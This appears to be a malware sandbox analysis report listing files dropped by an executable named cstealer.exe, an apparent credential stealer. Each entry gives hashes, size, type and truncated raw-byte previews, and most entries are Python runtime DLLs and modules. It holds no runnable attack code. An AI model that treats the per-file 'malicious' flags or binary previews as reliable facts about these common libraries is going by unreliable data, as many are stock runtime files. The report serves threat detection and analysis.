                                                                                                                                                          SSDEEP:1536:douLz7p5Tcayt0KpkKWVa5cNRT8+smUxJIDtVH7SyD8Px:2uLz9meVamQ+sLxJIDtVHVsx
                                                                                                                                                          MD5:4101128E19134A4733028CFAAFC2F3BB
                                                                                                                                                          SHA1:66C18B0406201C3CFBBA6E239AB9EE3DBB3BE07D
                                                                                                                                                          SHA-256:5843872D5E2B08F138A71FE9BA94813AFEE59C8B48166D4A8EB0F606107A7E80
                                                                                                                                                          SHA-512:4F2FC415026D7FD71C5018BC2FFDF37A5B835A417B9E5017261849E36D65375715BAE148CE8F9649F9D807A63AC09D0FB270E4ABAE83DFA371D129953A5422CA
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........U...U...U...\.E._......W....+.V......X......]......Q......V......W...U..........]......T....).T......T...RichU...........PE..d...t.Vc.........." ...!.....^......,........................................P......nP....`.........................................p...H............0....... .. ........)...@..........T...........................p...@............................................text...O........................... ..`.rdata..L>.......@..................@..@.data...............................@....pdata.. .... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI38562\_ctypes.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):123768
                                                                                                                                                          Entropy (8bit):6.017133084000375
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:QC7Pgg3AwEWwSQJKoPfLSHcn0YJwyncXf9IDQPj6Exv:Qz5IX8jPfLSMJwykfoy
                                                                                                                                                          MD5:6A9CA97C039D9BBB7ABF40B53C851198
                                                                                                                                                          SHA1:01BCBD134A76CCD4F3BADB5F4056ABEDCFF60734
                                                                                                                                                          SHA-256:E662D2B35BB48C5F3432BDE79C0D20313238AF800968BA0FAA6EA7E7E5EF4535
                                                                                                                                                          SHA-512:DEDF7F98AFC0A94A248F12E4C4CA01B412DA45B926DA3F9C4CBC1D2CBB98C8899F43F5884B1BF1F0B941EDAEEF65612EA17438E67745962FF13761300910960D
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........:..[y..[y..[y..#.[y.. x..[y.. |..[y.. }..[y.. z..[y.. x..[y.O)}..[y.O)x..[y.).x..[y..[x.h[y.. t..[y.. y..[y.. ...[y.. {..[y.Rich.[y.................PE..d...n.Vc.........." ...!.............]...............................................[....`..........................................Q......TR..........................x)..............T...........................`...@............................................text............................... ..`.rdata...m.......n..................@..@.data...$=...p...8...b..............@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI38562\_decimal.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):251768
                                                                                                                                                          Entropy (8bit):6.543870948107038
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6144:3JhhPXoWcz5HvcQpq9Sr9pmHboiYE9qWM53pLW1AmXYWtmVS9G:fNXoWcznq9Sr9pyKFh6eS9G
                                                                                                                                                          MD5:D47E6ACF09EAD5774D5B471AB3AB96FF
                                                                                                                                                          SHA1:64CE9B5D5F07395935DF95D4A0F06760319224A2
                                                                                                                                                          SHA-256:D0DF57988A74ACD50B2D261E8B5F2C25DA7B940EC2AAFBEE444C277552421E6E
                                                                                                                                                          SHA-512:52E132CE94F21FA253FED4CF1F67E8D4423D8C30224F961296EE9F64E2C9F4F7064D4C8405CD3BB67D3CF880FE4C21AB202FA8CF677E3B4DAD1BE6929DBDA4E2
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\F1S.'_..'_..'_.._...'_..\^..'_..\Z..'_..\[..'_..\\..'_..\^..'_..U^..'_..'^..'_..\\..'_..\R..'_..\_..'_..\...'_..\]..'_.Rich.'_.................PE..d...k.Vc.........." ...!.v...<......|...............................................o.....`..........................................T..P....T..................H'......x)......P.......T...........................P...@............................................text...)u.......v.................. ..`.rdata...............z..............@..@.data....*...p...$...R..............@....pdata..H'.......(...v..............@..@.rsrc...............................@..@.reloc..P...........................@..B................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI38562\_hashlib.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):63872
                                                                                                                                                          Entropy (8bit):6.166853300594844
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:18njpHxGkYjEEEJkn8cw6ThID5IJt7SyiPx:GnjpHxRJ8w6ThID5IJtEx
                                                                                                                                                          MD5:DE4D104EA13B70C093B07219D2EFF6CB
                                                                                                                                                          SHA1:83DAF591C049F977879E5114C5FEA9BBBFA0AD7B
                                                                                                                                                          SHA-256:39BC615842A176DB72D4E0558F3CDCAE23AB0623AD132F815D21DCFBFD4B110E
                                                                                                                                                          SHA-512:567F703C2E45F13C6107D767597DBA762DC5CAA86024C87E7B28DF2D6C77CD06D3F1F97EED45E6EF127D5346679FEA89AC4DC2C453CE366B6233C0FA68D82692
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........A.g...g...g.......g..V....g..V....g..V....g..V....g..X....g.......g.......g...g..Qg..X....g..X....g..X.l..g..X....g..Rich.g..........................PE..d...u.Vc.........." ...!.T...~......@?....................................................`.............................................P.......................,........)......\...0}..T............................{..@............p..(............................text...YR.......T.................. ..`.rdata...N...p...P...X..............@..@.data...8...........................@....pdata..,...........................@..@.rsrc...............................@..@.reloc..\...........................@..B........................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI38562\_lzma.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):158080
                                                                                                                                                          Entropy (8bit):6.835761878596918
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:5mGf4k8d79MwyHiRr7tznf49mNoaGjQJplJIDe10Yhx:5Pf4FhMwyMAYOao6P
                                                                                                                                                          MD5:337B0E65A856568778E25660F77BC80A
                                                                                                                                                          SHA1:4D9E921FEAEE5FA70181EBA99054FFA7B6C9BB3F
                                                                                                                                                          SHA-256:613DE58E4A9A80EFF8F8BC45C350A6EAEBF89F85FFD2D7E3B0B266BF0888A60A
                                                                                                                                                          SHA-512:19E6DA02D9D25CCEF06C843B9F429E6B598667270631FEBE99A0D12FC12D5DA4FB242973A8351D3BF169F60D2E17FE821AD692038C793CE69DFB66A42211398E
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........X...6D..6D..6D..D..6D@.7E..6D@.3E..6D@.2E..6D@.5E..6DN.7E..6D..7E..6D..7D..6DN.;E..6DN.6E..6DN..D..6DN.4E..6DRich..6D........PE..d...~.Vc.........." ...!.d...........8..............................................O.....`..........................................%..L...\%..x....p.......P.......@...)......8.......T...........................p...@............................................text...~c.......d.................. ..`.rdata..............h..............@..@.data........@......................@....pdata.......P....... ..............@..@.rsrc........p.......4..............@..@.reloc..8............>..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI38562\_queue.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):31104
                                                                                                                                                          Entropy (8bit):6.35436407327013
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:cQuCvO+MZFryl9SDCg6rXv5mkWsnTBq9ID7UJIYiSy1pCQYIPxh8E9VF0Nyb9:cl+yFp6rXRmk5s9ID7UeYiSyv7PxWER
                                                                                                                                                          MD5:FF8300999335C939FCCE94F2E7F039C0
                                                                                                                                                          SHA1:4FF3A7A9D9CA005B5659B55D8CD064D2EB708B1A
                                                                                                                                                          SHA-256:2F71046891BA279B00B70EB031FE90B379DBE84559CF49CE5D1297EA6BF47A78
                                                                                                                                                          SHA-512:F29B1FD6F52130D69C8BD21A72A71841BF67D54B216FEBCD4E526E81B499B9B48831BB7CDFF0BFF6878AAB542CA05D6326B8A293F2FB4DD95058461C0FD14017
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........MX..#...#...#.......#..."...#...&...#...'...#... ...#..."...#.Q."...#..."...#.......#...#...#.......#...!...#.Rich..#.........................PE..d...d.Vc.........." ...!.....8.......................................................K....`..........................................C..L....C..d....p.......`.......P...)..........p4..T...........................03..@............0..0............................text............................... ..`.rdata..R....0......................@..@.data...x....P.......<..............@....pdata.......`.......@..............@..@.rsrc........p.......D..............@..@.reloc...............N..............@..B................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI38562\_socket.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):78200
                                                                                                                                                          Entropy (8bit):6.239347454910878
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:HJlcAdpEVuju9/s+S+pJGQRivVia3i9IDQw17Sy+Px3sxi:H7ce+uju9/sT+pJGdvVp3i9IDQw1kxZ
                                                                                                                                                          MD5:8140BDC5803A4893509F0E39B67158CE
                                                                                                                                                          SHA1:653CC1C82BA6240B0186623724AEC3287E9BC232
                                                                                                                                                          SHA-256:39715EF8D043354F0AB15F62878530A38518FB6192BC48DA6A098498E8D35769
                                                                                                                                                          SHA-512:D0878FEE92E555B15E9F01CE39CFDC3D6122B41CE00EC3A4A7F0F661619F83EC520DCA41E35A1E15650FB34AD238974FE8019577C42CA460DDE76E3891B0E826
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........w....................*.......*.......*.......*.......$...............y.......$.......$.......$.......$.......Rich............................PE..d...s.Vc.........." ...!.l...........%.......................................P......h.....`.........................................@...P............0....... ..x.......x)...@..........T...............................@............................................text....k.......l.................. ..`.rdata..Dt.......v...p..............@..@.data...............................@....pdata..x.... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI38562\_sqlite3.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):118656
                                                                                                                                                          Entropy (8bit):6.2256831065058815
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:fArVnbGK9SGnh8u6rqMD6ciFCrl14zZvV9NdJRvdO5yt6sqM7VjEP/OsYpxtXr9T:YrVSK9SGnh8u6ESx5CVQP/yXZ
                                                                                                                                                          MD5:D4324D1E8DB7FCF220C5C541FECCE7E3
                                                                                                                                                          SHA1:1CAF5B23AE47F36D797BC6BDD5B75B2488903813
                                                                                                                                                          SHA-256:DDBED9D48B17C54FD3005F5A868DD63CB8F3EFE2C22C1821CEBB2FE72836E446
                                                                                                                                                          SHA-512:71D56D59E019CF42CEA88203D9C6E50F870CD5C4D5C46991ACBFF3AB9FF13F78D5DBF5D1C2112498FC7E279D41EE27DB279B74B4C08A60BB4098F9E8C296B5D8
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......pU..44..44..44..=Ls.04...O.64...O..54...O.94...O.<4...O.74...O.14...F.64..44.15...O.=4...O..54...O..54...O.54..Rich44..........................PE..d.....Vc.........." ...!............ ....................................................`..........................................Z..P....Z...........................)..............T...........................p...@............................................text............................... ..`.rdata..\...........................@..@.data................n..............@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI38562\_ssl.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):159616
                                                                                                                                                          Entropy (8bit):5.9948013841482926
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:qFrIQQey4VWR98w/PQQcXo8uOVrGxn+SQOXLkd1ItS+Q8YuAfxJIDt75EHx:eEeRV29//4QcJuOynyvxX
                                                                                                                                                          MD5:069BCCC9F31F57616E88C92650589BDD
                                                                                                                                                          SHA1:050FC5CCD92AF4FBB3047BE40202D062F9958E57
                                                                                                                                                          SHA-256:CB42E8598E3FA53EEEBF63F2AF1730B9EC64614BDA276AB2CD1F1C196B3D7E32
                                                                                                                                                          SHA-512:0E5513FBE42987C658DBA13DA737C547FF0B8006AECF538C2F5CF731C54DE83E26889BE62E5C8A10D2C91D5ADA4D64015B640DAB13130039A5A8A5AB33A723DC
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B3"..RL,.RL,.RL,.*.,.RL,.)M-.RL,.)I-.RL,.)H-.RL,.)O-.RL,.)M-.RL,b(M-.RL,.RM,.SL,. M-.RL,.)A-.RL,.)L-.RL,.).,.RL,.)N-.RL,Rich.RL,........................PE..d.....Vc.........." ...!............l+....................................................`.............................................d............`.......P.......F...)...p..4... ...T...............................@...............x............................text............................... ..`.rdata..............................@..@.data....j.......f..................@....pdata.......P......."..............@..@.rsrc........`......................@..@.reloc..4....p.......8..............@..B........................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI38562\base_library.zip

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1439447
                                                                                                                                                          Entropy (8bit):5.58639468240011
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24576:6QRqL5TPAxNWlUKdcubgAnj90H0AWfh7dYMbP/Medfw:6QRqL2xNbeA
                                                                                                                                                          MD5:83D235E1F5B0EE5B0282B5AB7244F6C4
                                                                                                                                                          SHA1:629A1CE71314D7ABBCE96674A1DDF9F38C4A5E9C
                                                                                                                                                          SHA-256:DB389A9E14BFAC6EE5CCE17D41F9637D3FF8B702CC74102DB8643E78659670A0
                                                                                                                                                          SHA-512:77364AFF24CFC75EE32E50973B7D589B4A896D634305D965ECBC31A9E0097E270499DBEC93126092EB11F3F1AD97692DB6CA5927D3D02F3D053336D6267D7E5F
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:PK..........!. ..y............_collections_abc.pyc............................................d.Z.d.d.l.m.Z.m.Z...d.d.l.Z...e.e.e.........................Z...e.d...............Z.d...Z...e.e...............Z.[.g.d...Z.d.Z...e...e.d.............................Z...e...e...e...........................................Z...e...e.i.................................................................Z...e...e.i.................................................................Z...e...e.i.................................................................Z...e...e.g.............................Z...e...e...e.g...........................................Z...e...e...e.d...........................................Z...e...e...e.d.d.z.............................................Z...e...e...e...........................................Z...e...e.d.............................Z ..e...e.d.............................Z!..e...e...e"..........................................Z#..e.i.......................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI38562\certifi\cacert.pem

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:ASCII text
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):292541
                                                                                                                                                          Entropy (8bit):6.048162209044241
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6144:QW1x/M8fRR1jplkXURrVADwYCuCigT/Q5MSRqNb7d8iu5NF:QWb/TRJLWURrI55MWavdF0D
                                                                                                                                                          MD5:D3E74C9D33719C8AB162BAA4AE743B27
                                                                                                                                                          SHA1:EE32F2CCD4BC56CA68441A02BF33E32DC6205C2B
                                                                                                                                                          SHA-256:7A347CA8FEF6E29F82B6E4785355A6635C17FA755E0940F65F15AA8FC7BD7F92
                                                                                                                                                          SHA-512:E0FB35D6901A6DEBBF48A0655E2AA1040700EB5166E732AE2617E89EF5E6869E8DDD5C7875FA83F31D447D4ABC3DB14BFFD29600C9AF725D9B03F03363469B4C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.# Issuer: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Subject: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Label: "GlobalSign Root CA".# Serial: 4835703278459707669005204.# MD5 Fingerprint: 3e:45:52:15:09:51:92:e1:b7:5d:37:9f:b1:87:29:8a.# SHA1 Fingerprint: b1:bc:96:8b:d4:f4:9d:62:2a:a8:9a:81:f2:15:01:52:a4:1d:82:9c.# SHA256 Fingerprint: eb:d4:10:40:e4:bb:3e:c7:42:c9:e3:81:d3:1e:f2:a4:1a:48:b6:68:5c:96:e7:ce:f3:c1:df:6c:d4:33:1c:99.-----BEGIN CERTIFICATE-----.MIIDdTCCAl2gAwIBAgILBAAAAAABFUtaw5QwDQYJKoZIhvcNAQEFBQAwVzELMAkG.A1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExEDAOBgNVBAsTB1Jv.b3QgQ0ExGzAZBgNVBAMTEkdsb2JhbFNpZ24gUm9vdCBDQTAeFw05ODA5MDExMjAw.MDBaFw0yODAxMjgxMjAwMDBaMFcxCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9i.YWxTaWduIG52LXNhMRAwDgYDVQQLEwdSb290IENBMRswGQYDVQQDExJHbG9iYWxT.aWduIFJvb3QgQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDaDuaZ.jc6j40+Kfvvxi4Mla+pIH/EqsLmVEQS98GPR4mdmzxzdzxtIK+6NiY6arymAZavp.xy0Sy6scTHAHoT0KMM0VjU/43dSMUBUc71DuxC73/OlS8pF94G3VNTCOXkNz

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI38562\charset_normalizer\md.cp311-win_amd64.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):10752
                                                                                                                                                          Entropy (8bit):4.673454313041419
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:KG+p72HzA5iJGhU2Y0hQMsQJCUCLsZEA4elh3XQMtCFliHUWQcX6g8cim1qeSju1:A2HzzU2bRYoeLHkcqgvimoe
                                                                                                                                                          MD5:723EC2E1404AE1047C3EF860B9840C29
                                                                                                                                                          SHA1:8FC869B92863FB6D2758019DD01EDBEF2A9A100A
                                                                                                                                                          SHA-256:790A11AA270523C2EFA6021CE4F994C3C5A67E8EAAAF02074D5308420B68BD94
                                                                                                                                                          SHA-512:2E323AE5B816ADDE7AAA14398F1FDB3EFE15A19DF3735A604A7DB6CADC22B753046EAB242E0F1FBCD3310A8FBB59FF49865827D242BAF21F44FD994C3AC9A878
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B..............................M....................................... ...?.......?.......?.a.....?.......Rich............................PE..d...siAe.........." ...%.....................................................p............`..........................................'..p...`(..d....P.......@...............`..,...`#.............................. "..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...8....0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......&..............@..@.reloc..,....`.......(..............@..B................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI38562\charset_normalizer\md__mypyc.cp311-win_amd64.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):119296
                                                                                                                                                          Entropy (8bit):5.872097486056729
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:OzgMw0g+m/+rxC9Jtd960WsCyqPD1/bZMlDML48Be9zGTVmZRJIRbvB:OsTH+VC9Jtd9VdCr7fMp/8yGTVmzmZ
                                                                                                                                                          MD5:9EA8098D31ADB0F9D928759BDCA39819
                                                                                                                                                          SHA1:E309C85C1C8E6CE049EEA1F39BEE654B9F98D7C5
                                                                                                                                                          SHA-256:3D9893AA79EFD13D81FCD614E9EF5FB6AAD90569BEEDED5112DE5ED5AC3CF753
                                                                                                                                                          SHA-512:86AF770F61C94DFBF074BCC4B11932BBA2511CAA83C223780112BDA4FFB7986270DC2649D4D3EA78614DBCE6F7468C8983A34966FC3F2DE53055AC6B5059A707
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..r...r...r......r...s...r...s...r...w...r...v..r...q...r.#.s...r...s...r..8z...r..8r...r..8....r..8p...r.Rich..r.........................PE..d...siAe.........." ...%.*..........0........................................ ............`.........................................p...d..........................................Px...............................w..@............@...............................text...X).......*.................. ..`.rdata...X...@...Z..................@..@.data...8=.......0..................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI38562\libcrypto-1_1.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):3441504
                                                                                                                                                          Entropy (8bit):6.097985120800337
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:49152:8TKuk2CQIU6iV9OjPWgBqIVRIaEv5LY/RnQ2ETEvrPnkbsYNPsNwsML1CPwDv3u6:Vv+KRi5KsEKsY+NwsG1CPwDv3uFfJu
                                                                                                                                                          MD5:6F4B8EB45A965372156086201207C81F
                                                                                                                                                          SHA1:8278F9539463F0A45009287F0516098CB7A15406
                                                                                                                                                          SHA-256:976CE72EFD0A8AEEB6E21AD441AA9138434314EA07F777432205947CDB149541
                                                                                                                                                          SHA-512:2C5C54842ABA9C82FB9E7594AE9E264AC3CBDC2CC1CD22263E9D77479B93636799D0F28235AC79937070E40B04A097C3EA3B7E0CD4376A95ED8CA90245B7891F
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........a...2...2...2...2...2..3...2..3...2..3...2..3...2...2...2L.3...2..3...2..3.2..3...2..p2...2..3...2Rich...2........................PE..d...m..b.........." ... ..$...................................................4....../5...`..........................................h/..h...*4.@....`4.|....`2.....Z4.`)...p4..O....,.8...........................`.,.@............ 4..............................text.....$.......$................. ..`.rdata........$.......$.............@..@.data...!z....1..,....1.............@....pdata.......`2.......1.............@..@.idata..^#... 4..$....3.............@..@.00cfg..u....P4.......3.............@..@.rsrc...|....`4.......3.............@..@.reloc...x...p4..z....3.............@..B................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI38562\libffi-8.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):35064
                                                                                                                                                          Entropy (8bit):6.362215445656998
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:SB8J4ihYfwYiXGPc9orPji8i4DDQWvGaRQsTeCXS/Fzc7jsFruRXYV1ZE9DRCXjQ:rGHs4vpegQsTT0uj82S7Fp2DG4yshH
                                                                                                                                                          MD5:32D36D2B0719DB2B739AF803C5E1C2F5
                                                                                                                                                          SHA1:023C4F1159A2A05420F68DAF939B9AC2B04AB082
                                                                                                                                                          SHA-256:128A583E821E52B595EB4B3DDA17697D3CA456EE72945F7ECCE48EDEDAD0E93C
                                                                                                                                                          SHA-512:A0A68CFC2F96CB1AFD29DB185C940E9838B6D097D2591B0A2E66830DD500E8B9538D170125A00EE8C22B8251181B73518B73DE94BEEEDD421D3E888564A111C1
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X................d.....N...................5...N......N......N....................................Rich............................PE..d....$(a.........." .....H...*.......L..............................................4.....`..........................................l.......o..P...............8....l..........(....b...............................c..8............`.. ............................text....G.......H.................. ..`.rdata..X....`.......L..............@..@.data................b..............@....pdata..8............d..............@..@.reloc..(............j..............@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI38562\libssl-1_1.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):702816
                                                                                                                                                          Entropy (8bit):5.547832370836076
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12288:UUnBMlBGdU/t0voUYHgqRJd7a7+JLvrfX7bOI8Fp0D6WuHU2lvzR:UN/t0vMnffOI8Fp0D6TU2lvzR
                                                                                                                                                          MD5:8769ADAFCA3A6FC6EF26F01FD31AFA84
                                                                                                                                                          SHA1:38BAEF74BDD2E941CCD321F91BFD49DACC6A3CB6
                                                                                                                                                          SHA-256:2AEBB73530D21A2273692A5A3D57235B770DAF1C35F60C74E01754A5DAC05071
                                                                                                                                                          SHA-512:FAC22F1A2FFBFB4789BDEED476C8DAF42547D40EFE3E11B41FADBC4445BB7CA77675A31B5337DF55FDEB4D2739E0FB2CBCAC2FEABFD4CD48201F8AE50A9BD90B
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.p*..p*..p*......p*...+..p*.\.+..p*.../..p*......p*...)..p*...+..p*..p+.iq*......p*...*..p*.....p*...(..p*.Rich.p*.........PE..d......b.........." ... .B...T......<.....................................................`.........................................@A...N..@U..........s........M......`)......h...0...8...............................@............@..@............................text....@.......B.................. ..`.rdata..J/...`...0...F..............@..@.data...AM.......D...v..............@....pdata...V.......X..................@..@.idata..%W...@...X..................@..@.00cfg..u............j..............@..@.rsrc...s............l..............@..@.reloc..l............t..............@..B................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI38562\python311.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):5758328
                                                                                                                                                          Entropy (8bit):6.089726305084683
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:98304:JdHwQkq3AAtsPv3XXTVEspHBMp4SsPxQpe2bx:JdHwQkq3AMsPvHXSpAxQpe2V
                                                                                                                                                          MD5:9A24C8C35E4AC4B1597124C1DCBEBE0F
                                                                                                                                                          SHA1:F59782A4923A30118B97E01A7F8DB69B92D8382A
                                                                                                                                                          SHA-256:A0CF640E756875C25C12B4A38BA5F2772E8E512036E2AC59EB8567BF05FFBFB7
                                                                                                                                                          SHA-512:9D9336BF1F0D3BC9CE4A636A5F4E52C5F9487F51F00614FC4A34854A315CE7EA8BE328153812DBD67C45C75001818FA63317EBA15A6C9A024FA9F2CAB163165B
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ih.-...-...-...r../...r@.#...r..!...r..%...r..)...$q..7....{..&...-...H...r......r..,...rB.,...r..,...Rich-...........PE..d...R.Vc.........." ...!.T%..,7......K........................................\......~X...`.........................................P.@......NA......`[.......V../....W.x)...p[..B....).T...........................P.).@............p%..............................text...BS%......T%................. ..`.rdata..0....p%......X%.............@..@.data.........A..N...\A.............@....pdata.../....V..0....Q.............@..@PyRuntim......X.......S.............@....rsrc........`[......fV.............@..@.reloc...B...p[..D...pV.............@..B........................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI38562\select.pyd

                                                                                                                                                          Download File
